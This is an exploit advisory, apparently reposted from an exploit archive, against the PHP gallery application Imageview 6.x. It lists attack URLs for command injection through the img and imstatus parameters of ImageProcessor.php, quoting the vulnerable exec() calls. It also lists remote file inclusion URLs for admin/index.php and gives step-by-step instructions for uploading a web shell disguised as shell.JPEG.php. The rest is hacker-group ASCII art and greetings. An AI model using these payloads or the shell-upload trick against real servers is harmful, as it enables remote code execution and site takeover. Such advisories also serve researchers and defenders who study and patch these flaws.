Exploit for php platform in category web applications
================================================
Imageview <= 6.x Multiple Remote Vulnerabilities
================================================
|| || | ||
o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,
( : / (_) / ( .
+-----------------------------------------------------------------------
-+
| ....... |
| ..''xxxxxxxxxxxxxxx'... |
| ..'xxxxxxxxxxxxxxxxxxxxxxxxxxx.. |
| ..'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'. |
| .'xxxxxxxxxxxxxxxxxxxxxxxxxxxx'''.......'. |
| .'xxxxxxxxxxxxxxxxxxxxx''...... ... .. |
| .xxxxxxxxxxxxxxxxxx'... ........ .'. |
| 'xxxxxxxxxxxxxxx'...... '. |
| 'xxxxxxxxxxxxxx'..'x.. .x. |
| .xxxxxxxxxxxx'...'.. ... .' |
| 'xxxxxxxxx'.. . .. .x. |
| xxxxxxx'. .. x. |
| xxxx'. .... x x. |
| 'x'. ...'xxxxxxx'. x .x. |
| .x'. .'xxxxxxxxxxxxxx. '' .' |
| .xx. .'xxxxxxxxxxxxxxxx. .'xx'''. .' |
| .xx.. 'xxxxxxxxxxxxxxxx' .'xxxxxxxxx''. |
| .'xx'. .'xxxxxxxxxxxxxxx. ..'xxxxxxxxxxxx' |
| .xxx'. .xxxxxxxxxxxx'. .'xxxxxxxxxxxxxx'. |
| .xxxx'.'xxxxxxxxx'. xxx'xxxxxxxxxx'. |
| .'xxxxxxx'.... ...xxxxxxx'. |
| ..'xxxxx'.. ..xxxxx'.. |
| ....'xx'.....''''... |
+-----------------------------------------------------------------------
-+
[+] Author : Sn!pEr.S!Te Hacker #
# [+] Email : [email protected] #
# [+] Inj3ct0r Team Hacker #
# [+] 10-10-2010 #
# [+] Script :lmage ? Imageview #
# [+] Download:http://www.blackdot.be/files/downloads/imageview6-install.zip#
# Version: [6.x] #
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=
[=-Exploit-=]
command :-
http://localhost/imageview6/system/ImageProcessor.php?img= [inj3ct0r command]
http://127.0.0.1/imageview6/system/ImageProcessor.php?imstatus= [inj3ct0r command]
line : 77
Code : exec ($ this->imagemagick_path.'version',$imstatus
line : 393
Code :exec ($img);
---------------------------------------------------------------------------------------------
[=-Exploit-=]
File inclusion :
http://localhost/imageview6/admin/index.php?GET=[inj3ct0r RFI]
http://127.0.0.1/imageview6/admin/index.php?GET=[ inj3ct0r RFI]
Line :86
Usage :
Add the Image text to your shell and rename it to shell.JPEG.php then Upload
Image Text :
[Uploader] : Site.com/imageview6/upload.php
If This Message appear :
Not a valid image type! (Only JPEG/PNG/GIF) ============> Upload Secsfull
[Path] : Site.com/imageview6/albums/Shell.JPEG.php
And use this addon for FireFox:
https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/
[Path] : Site.com/imageview6/albums/Shell.JPEG.php
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Thanks To All : www.Exploit-db.com | wwww.inj3ct0r.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
================== cyb3r army ==================================================
SeeMe ; Inj3ctOr ; Sid3^effects ; L0rd CrusAd3r ;indoushka ; The_Exploited
===========================all my friend ===================================
* PrX Hacker * Mr.aBoZ7Z7 * AbUbAdR * Nazi H4x0r * DMaR AL-TMiMi |
* Sm Hacker * Bnx Hacker * KaSpEr NaJd * FoX Hacker *HaNniBaL KsA |
# 0day.today [2018-01-04] #